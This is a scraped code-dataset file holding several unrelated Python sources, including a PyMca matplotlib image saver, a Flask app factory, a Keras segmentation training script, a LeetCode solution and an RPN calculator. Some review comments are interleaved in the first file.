0.0, 0.0)),\n 'green': ((0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0))}\n\n self.__reversedGrayCmap = LinearSegmentedColormap('yerg', cdict, 256)\n\n if fileName is not None:\n self.saveImage(fileName)\n\n def setImage(self, image=None):\n self.imageData = image\n\n def setParameters(self, ddict):\n self.config.update(ddict)\n\n def saveImage(self, filename):\n self.figure.clear()\n if (self.imageData is None) and\\\n (self.pixmapImage is None):\n return\n # The axes\n self.axes = self.figure.add_axes([.15, .15, .75, .8])\n if self.config['xaxis'] == 'off':\n self.axes.xaxis.set_visible(False)\n else:\n self.axes.xaxis.set_visible(True)\n nLabels = self.config['nxlabels']\n if nLabels not in ['Auto', 'auto', '0', 0]:\n self.axes.xaxis.set_major_locator(MaxNLocator(nLabels))\n else:\n self.axes.xaxis.set_major_locator(AutoLocator())\n if self.config['yaxis'] == 'off':\n self.axes.yaxis.set_visible(False)\n else:\n self.axes.yaxis.set_visible(True)\n if nLabels not in ['Auto', 'auto', '0', 0]:\n self.axes.yaxis.set_major_locator(MaxNLocator(nLabels))\n else:\n self.axes.yaxis.set_major_locator(AutoLocator())\n\n if self.pixmapImage is not None:\n self._savePixmapFigure(filename)\n return\n\n interpolation = self.config['interpolation']\n origin = self.config['origin']\n\n cmap = self.__temperatureCmap\n ccmap = cm.gray\n if self.config['colormap'] in ['grey','gray']:\n cmap = cm.gray\n ccmap = self.__temperatureCmap\n elif self.config['colormap'] in ['yarg','yerg']:\n cmap = self.__reversedGrayCmap\n ccmap = self.__temperatureCmap\n elif self.config['colormap']=='jet':\n cmap = cm.jet\n elif self.config['colormap']=='hot':\n cmap = cm.hot\n elif self.config['colormap']=='cool':\n cmap = cm.cool\n elif self.config['colormap']=='copper':\n cmap = cm.copper\n elif self.config['colormap']=='spectral':\n cmap = cm.spectral\n elif self.config['colormap']=='hsv':\n cmap = cm.hsv\n elif self.config['colormap']=='rainbow':\n cmap = cm.gist_rainbow\n elif self.config['colormap']=='red':\n cmap = self.__redCmap\n elif self.config['colormap']=='green':\n cmap = self.__greenCmap\n elif self.config['colormap']=='blue':\n cmap = self.__blueCmap\n elif 
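# Two caveats in saveImage above: the y-axis branch reuses nLabels from the
# x-axis branch, so config['nxlabels'] is applied to the y axis, and a
# NameError is raised when xaxis is 'off' while yaxis is on. Assuming
# config['nylabels'] was the intent, a corrected fragment would read:
#
#     if self.config['yaxis'] != 'off':
#         self.axes.yaxis.set_visible(True)
#         nLabels = self.config['nylabels']
#         if nLabels not in ['Auto', 'auto', '0', 0]:
#             self.axes.yaxis.set_major_locator(MaxNLocator(nLabels))
#         else:
#             self.axes.yaxis.set_major_locator(AutoLocator())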
self.config['colormap']=='temperature':\n cmap = self.__temperatureCmap\n elif self.config['colormap'] == 'paired':\n cmap = cm.Paired\n elif self.config['colormap'] == 'paired_r':\n cmap = cm.Paired_r\n elif self.config['colormap'] == 'pubu':\n cmap = cm.PuBu\n elif self.config['colormap'] == 'pubu_r':\n cmap = cm.PuBu_r\n elif self.config['colormap'] == 'rdbu':\n cmap = cm.RdBu\n elif self.config['colormap'] == 'rdbu_r':\n cmap = cm.RdBu_r\n elif self.config['colormap'] == 'gist_earth':\n cmap = cm.gist_earth\n elif self.config['colormap'] == 'gist_earth_r':\n cmap = cm.gist_earth_r\n elif self.config['colormap'] == 'blues':\n cmap = cm.Blues\n elif self.config['colormap'] == 'blues_r':\n cmap = cm.Blues_r\n elif self.config['colormap'] == 'ylgnbu':\n cmap = cm.YlGnBu\n elif self.config['colormap'] == 'ylgnbu_r':\n cmap = cm.YlGnBu_r\n else:\n _logger.warning(\"Unsupported colormap %s\", self.config['colormap'])\n _logger.warning(\"Defaulting to grayscale.\")\n\n if self.config['extent'] is None:\n h, w = self.imageData.shape\n x0 = self.config['xorigin']\n y0 = self.config['yorigin']\n w = w * self.config['xpixelsize']\n h = h * self.config['ypixelsize']\n if origin == 'upper':\n extent = (x0, w+x0,\n h+y0, y0)\n else:\n extent = (x0, w+x0,\n y0, h+y0)\n else:\n extent = self.config['extent']\n\n vlimits = self.__getValueLimits()\n if vlimits is None:\n imageData = self.imageData\n vmin = self.imageData.min()\n vmax = self.imageData.max()\n else:\n vmin = min(vlimits[0], vlimits[1])\n vmax = max(vlimits[0], vlimits[1])\n imageData = self.imageData.clip(vmin,vmax)\n\n if self.config['linlogcolormap'] != 'linear':\n if vmin <= 0:\n if vmax > 0:\n vmin = min(imageData[imageData>0])\n else:\n vmin = 0.0\n vmax = 1.0\n self._image = self.axes.imshow(imageData.clip(vmin,vmax),\n interpolation=interpolation,\n origin=origin,\n cmap=cmap,\n extent=extent,\n norm=LogNorm(vmin, vmax))\n else:\n self._image = self.axes.imshow(imageData,\n interpolation=interpolation,\n origin=origin,\n cmap=cmap,\n extent=extent,\n norm=Normalize(vmin, vmax))\n\n ylim = self.axes.get_ylim()\n\n if self.config['colorbar'] is not None:\n barorientation = self.config['colorbar']\n self._colorbar = self.figure.colorbar(self._image,\n orientation=barorientation)\n\n #contour plot\n if self.config['contour'] != 'off':\n dataMin = imageData.min()\n dataMax = imageData.max()\n ncontours = int(self.config['contourlevels'])\n contourlinewidth = int(self.config['contourlinewidth'])/10.\n levels = (numpy.arange(ncontours)) *\\\n (dataMax - dataMin)/float(ncontours)\n if self.config['contour'] == 'filled':\n self._contour = self.axes.contourf(imageData, levels,\n origin=origin,\n cmap=ccmap,\n extent=extent)\n else:\n self._contour = self.axes.contour(imageData, levels,\n origin=origin,\n cmap=ccmap,\n linewidths=contourlinewidth,\n extent=extent)\n if self.config['contourlabels'] != 'off':\n self.axes.clabel(self._contour, fontsize=9,\n inline=1, fmt=self.config['contourlabelformat'])\n if 0 and self.config['colorbar'] is not None:\n if barorientation == 'horizontal':\n barorientation = 'vertical'\n else:\n barorientation = 'horizontal'\n self._ccolorbar=self.figure.colorbar(self._contour,\n orientation=barorientation,\n extend='both')\n\n self.__postImage(ylim, filename)\n\n\n def setPixmapImage(self, image=None, bgr=False):\n if bgr:\n self.pixmapImage = image * 1\n self.pixmapImage[:,:,0] = image[:,:,2]\n self.pixmapImage[:,:,2] = image[:,:,0]\n else:\n self.pixmapImage = image\n\n def _savePixmapFigure(self, filename):\n 
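# The elif chain above maps colormap names one by one; a lookup table keeps
# the same behaviour in a few lines. A sketch covering a subset of the names
# handled above (note that cm.spectral has been removed from recent
# matplotlib releases; nipy_spectral is the usual replacement):
from matplotlib import cm

_CMAPS = {
    'jet': cm.jet, 'hot': cm.hot, 'cool': cm.cool, 'copper': cm.copper,
    'hsv': cm.hsv, 'rainbow': cm.gist_rainbow,
    'paired': cm.Paired, 'paired_r': cm.Paired_r,
}

def lookup_cmap(name, default):
    # unknown names fall back to the supplied default (temperature) map,
    # mirroring the final else branch above
    return _CMAPS.get(name, default)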
interpolation = self.config['interpolation']\n origin = self.config['origin']\n if self.config['extent'] is None:\n h= self.pixmapImage.shape[0]\n w= self.pixmapImage.shape[1]\n x0 = self.config['xorigin']\n y0 = self.config['yorigin']\n w = w * self.config['xpixelsize']\n h = h * self.config['ypixelsize']\n if origin == 'upper':\n extent = (x0, w+x0,\n h+y0, y0)\n else:\n extent = (x0, w+x0,\n y0, h+y0)\n else:\n extent = self.config['extent']\n self._image = self.axes.imshow(self.pixmapImage,\n interpolation=interpolation,\n origin=origin,\n extent=extent)\n\n ylim = self.axes.get_ylim()\n self.__postImage(ylim, filename)\n\n def __getValueLimits(self):\n if (self.config['valuemin'] is not None) and\\\n (self.config['valuemax'] is not None) and\\\n (self.config['valuemin'] != self.config['valuemax']):\n vlimits = (self.config['valuemin'],\n self.config['valuemax'])\n elif self.config['vlimits'] is not None:\n vlimits = self.config['vlimits']\n else:\n vlimits = None\n return vlimits\n\n def __postImage(self, ylim, filename):\n self.axes.set_title(self.config['title'])\n self.axes.set_xlabel(self.config['xlabel'])\n self.axes.set_ylabel(self.config['ylabel'])\n\n origin = self.config['origin']\n if (self.config['zoomxmin'] is not None) and\\\n (self.config['zoomxmax'] is not None)and\\\n (self.config['zoomxmax'] != self.config['zoomxmin']):\n xlimits = (self.config['zoomxmin'],\n self.config['zoomxmax'])\n elif self.config['xlimits'] is not None:\n xlimits = self.config['xlimits']\n else:\n xlimits = None\n\n if (self.config['zoomymin'] is not None) and\\\n (self.config['zoomymax'] is not None) and\\\n (self.config['zoomymax'] != self.config['zoomymin']):\n ylimits = (self.config['zoomymin'],\n self.config['zoomymax'])\n elif self.config['ylimits'] is not None:\n ylimits = self.config['ylimits']\n else:\n ylimits = None\n\n if ylimits is None:\n self.axes.set_ylim(ylim[0],ylim[1])\n else:\n ymin = min(ylimits)\n ymax = max(ylimits)\n if origin == \"lower\":\n self.axes.set_ylim(ymin, ymax)\n else:\n self.axes.set_ylim(ymax, ymin)\n\n if xlimits is not None:\n xmin = min(xlimits)\n xmax = max(xlimits)\n self.axes.set_xlim(xmin, xmax)\n\n self.canvas.print_figure(filename)\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) < 2:\n a=numpy.arange(1200.)\n a.shape = 20, 60\n PyMcaMatplotlibSaveImage(a, \"filename.png\", colormap=\"rainbow\")\n print(\"Image filename.png saved\")\n else:\n w=PyMcaMatplotlibSave(legends=True)\n x = numpy.arange(1200.)\n w.setLimits(0, 1200., 0, 12000.)\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n else:\n n = 14\n for i in range(n):\n y = x * i\n w.addDataToPlot(x,y, legend=\"%d\" % i)\n #w.setTitle('title')\n w.setXLabel('Channel')\n w.setYLabel('Counts')\n w.plotLegends()\n w.saveFile(\"filename.png\")\n print(\"Plot filename.png saved\")\n sys.exit(0)\n\n","repo_name":"vasole/pymca","sub_path":"PyMca5/PyMcaCore/PyMcaMatplotlibSave.py","file_name":"PyMcaMatplotlibSave.py","file_ext":"py","file_size_in_byte":23510,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"35"} +{"seq_id":"13111445442","text":"from flask import Flask\nfrom os import getenv\nfrom flask_mysqldb import MySQL\nfrom config import CLOUD_NAME, API_KEY, API_SECRET\nimport cloudinary\n\nmysql = MySQL()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = getenv('SECRET_KEY')\n app.config['MYSQL_HOST'] = getenv('DB_HOST')\n app.config['MYSQL_USER'] = getenv('DB_USERNAME')\n app.config['MYSQL_PASSWORD'] = 
getenv('DB_PASSWORD')\n app.config['MYSQL_DB'] = getenv('DB_NAME')\n mysql.init_app(app)\n cloudinary.config(\n cloud_name=CLOUD_NAME,\n api_key=API_KEY,\n api_secret=API_SECRET,)\n\n\n\n if __name__ == '__main__':\n app.run(debug=True)\n\n\n from .webapp import home, program, student, college, course\n\n app.register_blueprint(home, url_prefix='/')\n app.register_blueprint(program, url_prefix='/')\n app.register_blueprint(student, url_prefix='/')\n app.register_blueprint(college, url_prefix='/')\n app.register_blueprint(course, url_prefix='/')\n\n return app","repo_name":"rossallyn/STUDENT-MANAGEMENT-SYSTEM-","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20203143461","text":"from setuptools import find_packages, setup\n\nMAIN_REQUIREMENTS = [\"airbyte-cdk\", \"PyJWT==2.4.0\", \"cryptography==37.0.4\", \"requests\", \"pandas\"]\n\nTEST_REQUIREMENTS = [\n \"freezegun\",\n \"pytest~=6.1\",\n \"pytest-mock~=3.6.1\",\n \"requests-mock\",\n]\n\nsetup(\n name=\"source_google_analytics_data_api\",\n description=\"Source implementation for Google Analytics Data Api.\",\n author=\"Airbyte\",\n author_email=\"contact@airbyte.io\",\n packages=find_packages(),\n install_requires=MAIN_REQUIREMENTS,\n package_data={\"\": [\"*.json\", \"schemas/*.json\"]},\n extras_require={\n \"tests\": TEST_REQUIREMENTS,\n },\n)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-google-analytics-data-api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"41287713251","text":"import shutil\nimport os\nimport random\nimport numpy as np\nimport yaml\nfrom pathlib import Path\nfrom datetime import datetime\nimport pytz\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger\nfrom image_utils import TensorBoardImage, ImagesAndMasksGenerator, trainGenerator\nimport git\nfrom gcp_utils import copy_folder_locally_if_missing\nfrom models import generate_compiled_segmentation_model\n\n\nmetadata_file_name = 'metadata.yaml'\ntmp_directory = Path('./tmp')\n\n\ndef sample_image_and_mask_paths(generator, n_paths):\n random.seed(0)\n rand_inds = [random.randint(0, len(generator.image_filenames)-1) for _ in range(n_paths)]\n image_paths = list(np.asarray(generator.image_filenames)[rand_inds])\n mask_paths = list(np.asarray(generator.mask_filenames)[rand_inds])\n # mask_paths = [{c: list(np.asarray(generator.mask_filenames[c]))[i] for c in generator.mask_filenames} for i in rand_inds]\n return list(zip(image_paths, mask_paths))\n\n\ndef train(gcp_bucket, config_file):\n\n start_dt = datetime.now()\n\n with Path(config_file).open('r') as f:\n train_config = yaml.safe_load(f)['train_config']\n\n assert \"gs://\" in gcp_bucket\n\n # clean up the tmp directory\n try:\n shutil.rmtree(tmp_directory.as_posix())\n except FileNotFoundError:\n pass\n tmp_directory.mkdir()\n\n local_dataset_dir = Path(tmp_directory, 'datasets')\n\n copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'datasets', train_config['dataset_id']),\n local_dataset_dir)\n\n model_id = \"{}_{}\".format(train_config['model_id_prefix'], datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'))\n model_dir = Path(tmp_directory, 'models', model_id)\n model_dir.mkdir(parents=True)\n\n plots_dir = 
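# The `if __name__ == '__main__': app.run(debug=True)` block inside
# create_app above is dead code: in a package __init__, __name__ is the
# package name and never '__main__', and even if it ran it would start the
# server before the blueprints are registered. The usual pattern is a
# separate entry point; a sketch (run.py is a hypothetical file name):
#
#     from app import create_app
#
#     app = create_app()
#
#     if __name__ == '__main__':
#         app.run(debug=True)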
Path(model_dir, 'plots')\n plots_dir.mkdir(parents=True)\n\n logs_dir = Path(model_dir, 'logs')\n logs_dir.mkdir(parents=True)\n\n with Path(local_dataset_dir, train_config['dataset_id'], 'config.yaml').open('r') as f:\n dataset_config = yaml.safe_load(f)['dataset_config']\n\n with Path(model_dir, 'config.yaml').open('w') as f:\n yaml.safe_dump({'train_config': train_config}, f)\n\n target_size = dataset_config['target_size']\n batch_size = train_config['batch_size']\n epochs = train_config['epochs']\n augmentation_type = train_config['data_augmentation']['augmentation_type']\n\n if augmentation_type == 'necstlab': # necstlab's workflow\n train_generator = ImagesAndMasksGenerator(\n Path(local_dataset_dir, train_config['dataset_id'], 'train').as_posix(),\n rescale=1./255,\n target_size=target_size,\n batch_size=batch_size,\n shuffle=True,\n random_rotation=train_config['data_augmentation']['necstlab_augmentation']['random_90-degree_rotations'],\n seed=train_config['training_data_shuffle_seed'])\n\n validation_generator = ImagesAndMasksGenerator(\n Path(local_dataset_dir, train_config['dataset_id'],\n 'validation').as_posix(),\n rescale=1./255,\n target_size=target_size,\n batch_size=batch_size)\n elif augmentation_type == 'bio': # new workflow\n bio_augmentation = train_config['data_augmentation']['bio_augmentation']\n augmentation_dict = dict(rotation_range=bio_augmentation['rotation_range'],\n width_shift_range=bio_augmentation['width_shift_range'],\n height_shift_range=bio_augmentation['height_shift_range'],\n shear_range=bio_augmentation['shear_range'],\n zoom_range=bio_augmentation['zoom_range'],\n horizontal_flip=bio_augmentation['horizontal_flip'],\n fill_mode=bio_augmentation['fill_mode'],\n cval=0)\n train_generator = trainGenerator(\n batch_size=batch_size,\n train_path=Path(local_dataset_dir, train_config['dataset_id'], 'train').as_posix(),\n image_folder='images',\n mask_folder='masks',\n aug_dict=augmentation_dict,\n target_size=target_size,\n seed=train_config['training_data_shuffle_seed'])\n\n validation_generator = trainGenerator(\n batch_size=batch_size,\n train_path=Path(local_dataset_dir, train_config['dataset_id'], 'validation').as_posix(),\n image_folder='images',\n mask_folder='masks',\n aug_dict=augmentation_dict,\n target_size=target_size,\n seed=train_config['training_data_shuffle_seed'])\n\n compiled_model = generate_compiled_segmentation_model(\n train_config['segmentation_model']['model_name'],\n train_config['segmentation_model']['model_parameters'],\n 1,\n train_config['loss'],\n train_config['optimizer'])\n\n model_checkpoint_callback = ModelCheckpoint(Path(model_dir, 'model.hdf5').as_posix(),\n monitor='loss', verbose=1, save_best_only=True)\n tensorboard_callback = TensorBoard(log_dir=logs_dir.as_posix(), batch_size=batch_size, write_graph=True,\n write_grads=False, write_images=True, update_freq='epoch')\n\n # n_sample_images = 20\n # train_image_and_mask_paths = sample_image_and_mask_paths(train_generator, n_sample_images)\n # validation_image_and_mask_paths = sample_image_and_mask_paths(validation_generator, n_sample_images)\n\n # tensorboard_image_callback = TensorBoardImage(\n # log_dir=logs_dir.as_posix(),\n # images_and_masks_paths=train_image_and_mask_paths + validation_image_and_mask_paths)\n\n csv_logger_callback = CSVLogger(Path(model_dir, 'metrics.csv').as_posix(), append=True)\n\n results = compiled_model.fit_generator(\n train_generator,\n steps_per_epoch=len(train_generator) if augmentation_type == 'necstlab' else 
train_config['data_augmentation']['bio_augmentation']['steps_per_epoch'],\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=len(validation_generator) if augmentation_type == 'necstlab' else train_config['data_augmentation']['bio_augmentation']['validation_steps'],\n callbacks=[model_checkpoint_callback, tensorboard_callback, csv_logger_callback])\n\n metric_names = ['loss'] + [m.name for m in compiled_model.metrics]\n\n for metric_name in metric_names:\n\n fig, ax = plt.subplots()\n for split in ['train', 'validate']:\n\n key_name = metric_name\n if split == 'validate':\n key_name = 'val_' + key_name\n\n ax.plot(range(epochs), results.history[key_name], label=split)\n ax.set_xlabel('epochs')\n if metric_name == 'loss':\n ax.set_ylabel(compiled_model.loss.__name__)\n else:\n ax.set_ylabel(metric_name)\n ax.legend()\n if metric_name == 'loss':\n fig.savefig(Path(plots_dir, compiled_model.loss.__name__ + '.png').as_posix())\n else:\n fig.savefig(Path(plots_dir, metric_name + '.png').as_posix())\n\n # mosaic plot\n fig2, axes = plt.subplots(nrows=2, ncols=3, figsize=(10, 6))\n counter_m = 0\n counter_n = 0\n for metric_name in metric_names:\n\n for split in ['train', 'validate']:\n\n key_name = metric_name\n if split == 'validate':\n key_name = 'val_' + key_name\n\n axes[counter_m, counter_n].plot(range(epochs), results.history[key_name], label=split)\n axes[counter_m, counter_n].set_xlabel('epochs')\n if metric_name == 'loss':\n axes[counter_m, counter_n].set_ylabel(compiled_model.loss.__name__)\n else:\n axes[counter_m, counter_n].set_ylabel(metric_name)\n axes[counter_m, counter_n].legend()\n\n counter_n += 1\n if counter_n == 3: # 3 plots per row\n counter_m += 1\n counter_n = 0\n\n fig2.tight_layout()\n fig2.delaxes(axes[1][2])\n fig2.savefig(Path(plots_dir, 'metrics_mosaic.png').as_posix())\n\n metadata = {\n 'gcp_bucket': gcp_bucket,\n 'created_datetime': datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'),\n 'num_classes': 1,\n 'target_size': target_size,\n 'git_hash': git.Repo(search_parent_directories=True).head.object.hexsha,\n 'original_config_filename': config_file,\n 'elapsed_minutes': round((datetime.now() - start_dt).total_seconds() / 60, 1),\n 'dataset_config': dataset_config,\n 'train_config': train_config\n }\n\n with Path(model_dir, metadata_file_name).open('w') as f:\n yaml.safe_dump(metadata, f)\n\n os.system(\"gsutil -m cp -r '{}' '{}'\".format(Path(tmp_directory, 'models').as_posix(), gcp_bucket))\n\n shutil.rmtree(tmp_directory.as_posix())\n\n\nif __name__ == \"__main__\":\n import argparse\n import sys\n\n argparser = argparse.ArgumentParser(sys.argv[0])\n argparser.add_argument(\n '--gcp-bucket',\n type=str,\n help='The GCP bucket where the prepared data is located and to use to store the trained model.')\n argparser.add_argument(\n '--config-file',\n type=str,\n help='The location of the train configuration file.')\n\n train(**argparser.parse_args().__dict__)\n","repo_name":"ggoom/necstlab-damage-segmentation","sub_path":"train_segmentation_model.py","file_name":"train_segmentation_model.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28420547388","text":"\"\"\"Misc utilities!\"\"\"\nimport os\nfrom flask import Blueprint, request\nfrom labbot.controllers import utils\n\nmisc = Blueprint('misc', __name__, template_folder='templates/misc')\n@misc.route('/misc', defaults={'page': 'index'})\n@misc.route('/misc/index', 
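# The per-metric plotting loops above repeat the train/validate branches;
# a small helper expresses the same idea once. A sketch, assuming a
# Keras-style History object whose .history dict holds both 'metric' and
# 'val_metric' series of length `epochs`:
import matplotlib.pyplot as plt

def plot_metric(history, metric_name, epochs, out_path):
    fig, ax = plt.subplots()
    for split, key in (('train', metric_name), ('validate', 'val_' + metric_name)):
        ax.plot(range(epochs), history.history[key], label=split)
    ax.set_xlabel('epochs')
    ax.set_ylabel(metric_name)
    ax.legend()
    fig.savefig(out_path)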
methods=['POST'])\ndef index():\n \"\"\"Blank index page, still don't know why\"\"\"\n\n@misc.route('/misc/fortune', methods=['POST'])\ndef fortune():\n \"\"\"Get fortune\n \"\"\"\n utils.validate_token(request.form.get('token', None))\n\n #channel = request.form.get('channel_id', None)\n #text = request.form.get('text', None)\n\n fortune_str = os.popen('fortune').read()\n print(fortune_str)\n #str(fortune_str)\n #print(type(fortune_str))\n return fortune_str\n","repo_name":"jmacego/labbot","sub_path":"labbot/controllers/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35761000684","text":"# num = [1, 1]\r\n#\r\n# c=0\r\n#\r\n# for i in range(len(num) - 1):\r\n# if num[i]!=num[i + 1]:\r\n# num[c]=num[i]\r\n# num[i]=\"None\"\r\n# # num_len+=1\r\n# c+=1\r\n# if i == len(num)-2:\r\n# num[c] = num[i]\r\n# num[c] = num[i + 1]\r\n# # num_len+=1\r\n# num[i+1]=\"None\"\r\n# elif num[i]==num[i+1]:\r\n# num[i]=\"None\"\r\n# num_len=0\r\n# for i in num:\r\n# if i==\"None\":\r\n# num_len+=1\r\n# print(num_len)\r\n# print(num)\r\n\r\nnums = [1, 1, 2]\r\nc=0\r\n# for i in range(len(num)-1):\r\n# if num[i]==num[i+1]:\r\n# continue\r\n# elif num[i]!=num[i+1]:\r\n# c += 1\r\n# print(c)\r\n# num[c] = num[i]\r\n#\r\n# print(c+1)\r\n# print(num)\r\n# if len(nums) == 0:\r\n# return 0\r\nindex = 0\r\nfor i in range(1, len(nums)):\r\n if nums[i] != nums[index]:\r\n index += 1\r\n nums[index] = nums[i]\r\n print(nums)\r\n print (index+ 1)","repo_name":"Khushi-Jaiswal-2003/Leetcode","sub_path":"26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38310647243","text":"#jsonthingy\r\n\r\nfrom sentscript import *\r\nfrom sentimentDictionary import *\r\nimport json\r\nimport os\r\n\r\nDATA_PATH = os.getcwd()+ '/'\r\nkeywordFile = ''\r\n\r\n#write data\r\n\r\ncurrent = open(DATA_PATH+'keyword.txt', 'r+').read()\r\nif current != keywordFile:\r\n print(current)\r\n rv = '[Date, Values]'\r\n new_values = (searchFunction(current))\r\n with open(DATA_PATH + \"dump.csv\", \"w\") as outfile:\r\n if type(new_values) == float:\r\n json.dump(new_values,outfile)\r\n else:\r\n outfile.write(rv+'\\n')\r\n for key in new_values:\r\n json.dump(str([dateChanger(key),new_values[key]]), outfile, indent=2)\r\n outfile.write('\\n')\r\n keywordFile = current\r\n\r\n#clean data\r\n\r\nwith open(DATA_PATH + \"dump.csv\", \"r+\") as outfile:\r\n\tinPut = outfile.read()\r\n\toutPut = ''\r\n\tfor i in range(len(inPut)):\r\n\t\tif inPut[i] not in ['\"', '[', ']', \"'\"]:\r\n\t\t\toutPut += inPut[i]\r\n\r\n#rewrite data\r\nwith open(DATA_PATH + \"dump.csv\", \"w\") as outfile:\r\n\toutfile.write(outPut)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# # keyword = json.load(asdflkja;sdkfj; keyword)\r\n# # json.dump(searchFunction(keyword))\r\n\r\n# bulkData = searchFunction('one')\r\n\r\n# import httplib,json,urllib\r\n# headers = { \"charset\":\"utf-8\", \"Accept\": \"text/plain\"}\r\n# conn = httplib.HTTPConnection(\"localhost\")\r\n# #converting list to a json stream\r\n# bulkData = json.dumps(bulkData, ensure_ascii = 'False')\r\n# # ensure_ascii is false as data is in unicode and not ascii encoding , use this if data is in any other encoding\r\n# postData = urllib.urlencode({'results':bulkData})\r\n# 
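# The nums/index loop in the "Remove Duplicates from Sorted Array" record
# above is the standard two-pointer in-place dedup for a sorted list: `index`
# marks the last unique element written and each new value is copied forward.
# Wrapped as a function (LeetCode 26 style), with the empty-list guard the
# commented-out lines hint at:
def remove_duplicates(nums):
    if not nums:
        return 0
    index = 0
    for i in range(1, len(nums)):
        if nums[i] != nums[index]:
            index += 1
            nums[index] = nums[i]
    return index + 1  # number of unique values now at the front of nums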
conn.request(\"POST\", \"/getresult.php\", postData,headers)\r\n# # response = conn.getresponse()\r\n# # text = response.read()\r\n# # print (response.status,text)\r\n# # conn.close()\r\n\r\n","repo_name":"muruvig/angelhack","sub_path":"jsonthingy.py","file_name":"jsonthingy.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13638623478","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 18 22:47:17 2022\n\n@author: tungchentsai\n\"\"\"\n\nABS_WATCH_PATH = r\"~/Documents/GitHub/sftp-sync/tests/test_folder/\"\nIGNORE_PATTERNS = ['.DS_Store', '.ds_store']\n\nimport os\n\n\ndef run_module(module_name, *args):\n arguments = ' '.join(args)\n command = f'python -m {module_name} {arguments}'\n \n original_working_directory = os.getcwd()\n try:\n os.chdir(r\"..\") # parent directory of sftp_sync package\n print(f'Working directory was changed to {os.getcwd()}')\n os.system(command)\n finally:\n os.chdir(original_working_directory)\n print(f'Working directory was changed back to {os.getcwd()}')\n\n\nif __name__ == \"__main__\":\n watch_module = 'watch'\n watch_path = os.path.realpath(os.path.expanduser(ABS_WATCH_PATH))\n \n run_module(watch_module, watch_path, *IGNORE_PATTERNS)\n\n","repo_name":"TsaiTung-Chen/sftp-sync","sub_path":"tests/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9941993287","text":"#!/usr/bin/env python3\n\nimport operator\nimport readline\nimport logging\n\n\nhelp_message = \"\"\"\n'a': use last result output\n'q': quit\n\"\"\"\n\noperators = {\n\t'+': operator.add,\n\t'-': operator.sub,\n\t'*': operator.mul,\n\t'/': operator.truediv,\n\t'^': operator.pow,\n\t'%': operator.mod\n}\n\ndef help():\n\tprint(help_message)\n\ndef calculate(myarg, last_result = 0):\n\tstack = []\n\tfor token in myarg.split():\n\t\tif token == 'a':\n\t\t\tstack.append(last_result)\n\t\t\tcontinue\n\t\ttry:\n\t\t\ttoken = int(token)\n\t\t\tstack.append(token)\n\t\texcept ValueError:\n\t\t\tfunction = operators[token]\n\t\t\targ2 = stack.pop()\n\t\t\targ1 = stack.pop()\n\t\t\tresult = function(arg1, arg2)\n\t\t\tstack.append(result)\n\t\tlogging.info(stack)\n\t\t# print(stack)\n\tif len(stack) != 1:\n\t\traise TypeError(\"Too many parameters!\")\n\treturn stack.pop()\n\ndef main():\n\tlogging.basicConfig(filename=\"rpn.log\", level=logging.INFO)\n\tresult = 0\n\tfinished = False\n\twhile not finished:\n\t\tcmd = input(\"rpn calc ('h' for help)> \")\n\t\tif cmd == 'h':\n\t\t\thelp()\t\t\t\n\t\telif cmd == 'q':\n\t\t\treturn 0\n\t\telse:\n\t\t\tresult = calculate(cmd, result)\n\t\t\tprint(\"Result: \", result)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"ydtak/c4cs-f16-rpn","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26903384700","text":"from os import listdir\nfrom os.path import isfile, join\nfrom typing import Union\nfrom catcher.utils.logger import info\n\nfrom catcher.utils.module_utils import is_package_installed\n\n\nclass DockerCompose:\n \"\"\"\n :Docker-compose module:\n\n Will automatically run `docker-compose up -d` before your test and `down` after it if this\n module was enabled and you have `docker-compose.yml` file in your directory.\n\n :Enable this 
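# A few spot checks for the RPN evaluator in rpn.py above (uses its
# calculate() and operators table; '^' maps to pow and '/' to true division):
assert calculate("3 4 + 2 *") == 14             # (3 + 4) * 2
assert calculate("10 2 /") == 5.0               # true division returns a float
assert calculate("2 3 ^") == 8                  # '^' is exponentiation here
assert calculate("a 5 +", last_result=7) == 12  # 'a' recalls the last result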
